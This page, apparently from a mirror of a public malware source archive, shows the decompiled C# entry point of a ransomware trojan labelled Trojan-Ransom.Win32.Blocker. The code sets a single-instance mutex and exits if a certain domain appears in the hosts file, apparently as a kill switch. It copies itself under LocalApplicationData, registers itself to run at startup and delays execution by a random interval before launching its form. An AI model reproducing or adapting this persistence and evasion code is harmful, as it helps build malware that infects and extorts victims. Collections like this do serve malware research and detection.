mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
f2ac1ece55
add
47 lines
1.5 KiB
C#
47 lines
1.5 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: browser_bastan.Program
|
|
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
|
|
|
|
using SmartAssembly.MemoryManagement;
|
|
using System;
|
|
using System.IO;
|
|
using System.Threading;
|
|
using System.Windows.Forms;
|
|
|
|
namespace browser_bastan
|
|
{
|
|
internal static class Program
|
|
{
|
|
public static Mutex AppMutex = new Mutex(true, "{8F6F0AC4-B9A1-45fd-A8CF-72F04X6FDCCM}");
|
|
|
|
[STAThread]
|
|
private static void Main()
|
|
{
|
|
MemoryManager.AttachApp();
|
|
if (Program.AppMutex.WaitOne(TimeSpan.Zero, true))
|
|
{
|
|
Program.CheckHostsFile();
|
|
string path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\" + Araclar.DstName;
|
|
Araclar.DstCheck();
|
|
Araclar.Startup(Araclar.Regkeyname, path);
|
|
Thread.Sleep(new Random().Next(5000, 60000));
|
|
Application.EnableVisualStyles();
|
|
Application.SetCompatibleTextRenderingDefault(false);
|
|
Application.Run((Form) new Form1());
|
|
Program.AppMutex.ReleaseMutex();
|
|
}
|
|
else
|
|
Environment.Exit(1);
|
|
}
|
|
|
|
public static void CheckHostsFile()
|
|
{
|
|
if (!File.ReadAllText(Environment.GetEnvironmentVariable("windir") + "\\system32\\drivers\\etc\\hosts").Contains("nurullahuzmez.com"))
|
|
return;
|
|
Environment.Exit(1);
|
|
}
|
|
}
|
|
}
|